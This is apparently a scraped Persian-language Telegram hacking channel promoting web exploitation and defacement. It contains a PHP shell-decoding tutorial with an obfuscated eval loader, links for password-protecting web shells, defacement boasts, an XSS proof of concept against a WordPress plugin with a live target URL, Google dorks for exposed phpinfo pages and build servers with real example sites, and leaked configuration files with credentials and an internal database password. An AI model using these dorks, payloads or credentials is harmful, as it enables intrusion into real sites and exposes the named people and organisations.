0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#Decode - #Sh3ll - #Shell - #PHP
اموزش نحوه ی دیکد شل ها یا ویروس ها...
[+]———0Day.Boys—————[+]
اکثر بد افزار های PHP اعم از شل ها، تروجان و ...، معمولا به صورت رمزگذاری شده استفاده میشود.
مثلا شما زمانی که یک ویروس یا فایل مخرب PHP را پیدا میکنید، ممکن است با چنین چیزی مواجه شوید.

<?php eval(gzinflate(str_rot13(base64_decode('vUl6QttV ........... EP58V')))); ?>

برای این که بتوانیم فایل مخرب را رمز گشایی کنیم، می بایست تابع eval را با تابع print جایگزین کنیم تا کدهای اصلی برنامه به جای این که اجرا شود، فقط نمایش داده شود. سپس فایل را اجرا میکنیم و خروجی را مشاهده میکنیم که سورس اصلی برنامه خواهد بود.
اما همیشه مسئله به این سادگی نیست. گاهی اوقات رمز گشایی یک ویروس بسیار دشوار و زمان بر می باشد. مثلا ممکن است از فراخوانی های recursive تابع eval استفاده شده باشد. ضمن این که به جای تابع eval از چند تابع دیگر نیز می توان استفاده کرد.


[+] در این مطلب قصد دارم دو روش ساده برای رمز گشایی چنین فایل هایی را معرفی کنم :

1) اول سایت
http://www.unphp.net/
می باشد که به طور موثری این گونه فایل ها را رمز گشایی میکند و همچنین یک نمودار به شما تحویل می دهد که چگونگی رمز نگاری فایل را در قالب الگوریتم مشخص میکند.

مثال: این لینک را ببینید:
http://www.unphp.net/decode/989784f552ed894f67b7691487375a37/

———————————————-
2) ابزار دوم، این سایت است
http://ddecode.com/phpdecoder/
که امکان رمز گشایی php و فایل های hex را دارا می باشد. مثال های زیادی هم در صفحه ی اصلی سایت وجود دارد.

نمونه:
http://ddecode.com/phpdecoder/?results=989784f552ed894f67b7691487375a37
[+]———0Day.Boys—————[+]
T.me/LearnExploit
#Set #Password on the #WEB #Shell
اموزش قرار دادن پسورد روی شل
دوستان لطف کنن تست کنن اگر شد که هیچ ولی اگر نشد روش دوم رو رکورد کنیم.
دانلود لینک :
yon.ir/yiVJ7
ID : @IrDefacer
——
@LearnExploit
Forwarded from اتچ بات
#Set #Password on the #WEB #Shell
اموزش قرار دادن پسورد روی شل روش دوم
dl link : yon.ir/SVrUW
——————————
T.me/LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698680/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698684/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698678/

@LearnExploit
#`Exploit Title` : Wordpress Plugins flipbox Cross Site Scripting (XSS)
/————start :
#`Google Dork` : inurl:/wp-content/plugins/flipbox


#`Description` :
این اسیب پذیری در بخش view.php سایت میباشید و هرچیزی که بعد از view.php بیاید برای شما در سایت نمایش میدهد.

#`Poc` :
با روش زیر اکسپلویت رو انجام بدید :
view.php?pdf=<html><h1>Hacked by X0P4SH4</h1>

#`Example` :
https://www.rendezvous-carnetdevoyage.com/wp-content/plugins/flipbox/view.php?pdf=%3Chtml%3E%3Ch1%3EHacked%20by%20X0P4SH4%3C/h1%3E
———————
T.mE/LeaRNEXploIT
#Dork - #Find #PHPINFO
======================
Dork :
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
——
Example :
http://veconlab.econ.virginia.edu/phpinfo.php
======================
@LearnExploit
Forwarded from اتچ بات
#Dork - #Find #Publice #Servers
/————-/
[+]Dork:
intext:"Build dashboard" intext:"Project" intext:"Plan" intext:"Build"
—————
[+]Info:
با این دورک شما میتونید سرور های پابلیک مثل dashboard رو پیدا کنید.
همچنین این دورک به شما کمک میکند که فایل های مهمی مانند Log.txt هم دسترسی داشته باشید.
————-
[+]Example:
https://messir.uni.lu/bamboo/deploy/viewDeploymentResult.action?deploymentResultId=46170129
/—————/
T.me/LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
——————————————————
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
<appSettings>
<add key="URL" value="https://hclo365.sharepoint.com/sites/Academy/ING" />
<add key="AcademyConfig" value="AcademyConfig" />
<add key="AcademyMember" value="ING Visitors" />
<add key="UserName" value="Sudipta_b@hcl.com" />
<add key="EncryptKey" value="123"/>
<add key="Password" value="fWSqCZ2WdCbDBbY9gSPuadIY3pPhgzfCQGRQwZUdeZU=" />
<add key="ClientSettingsProvider.ServiceUri" value="" />
</appSettings>
<system.web>
<membership defaultProvider="ClientAuthenticationMembershipProvider">
<providers>
<add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
</providers>
</membership>
<roleManager defaultProvider="ClientRoleProvider" enabled="true">
<providers>
<add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
</providers>
</roleManager>
</system.web>
</configuration>
——————————————
فک نکنم دیگه نیاز به توضیح باشه...
=== > @LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
------------------
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
===========
t.me/learnexploit
سایت hackertest.net
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
سایت hackertest.net یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش هر روز 3 مرحله رو با هم میریم @soheileast ========== Channel = @LearnExploit
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-source:http://www.hackertest.net/
<==
2 )
بخش زیر رو در صفحه پیدا کنید :

<script language=JavaScript>
{
var a="null";
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
}
else
{
alert ("Try again");
}
}
}
</script>
در اسکریپ بالا اپدا یک متغییر تعریف میکنه و مقدار null رو به اون میده
بعدش میاد میگه که اگر از کل صفحه مقدار برار a ینی همون null بود کد زیر رو برامون اجرا کن :
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
تو این کد به ما میگه که اگر مقدار درست بود مارو به صفحه ی
document.a.c.value = a or null
http://www.hackertest.net/null.htm
هدایت کن
——————————-
T.me/LearnExploit
0Day.Today Boy's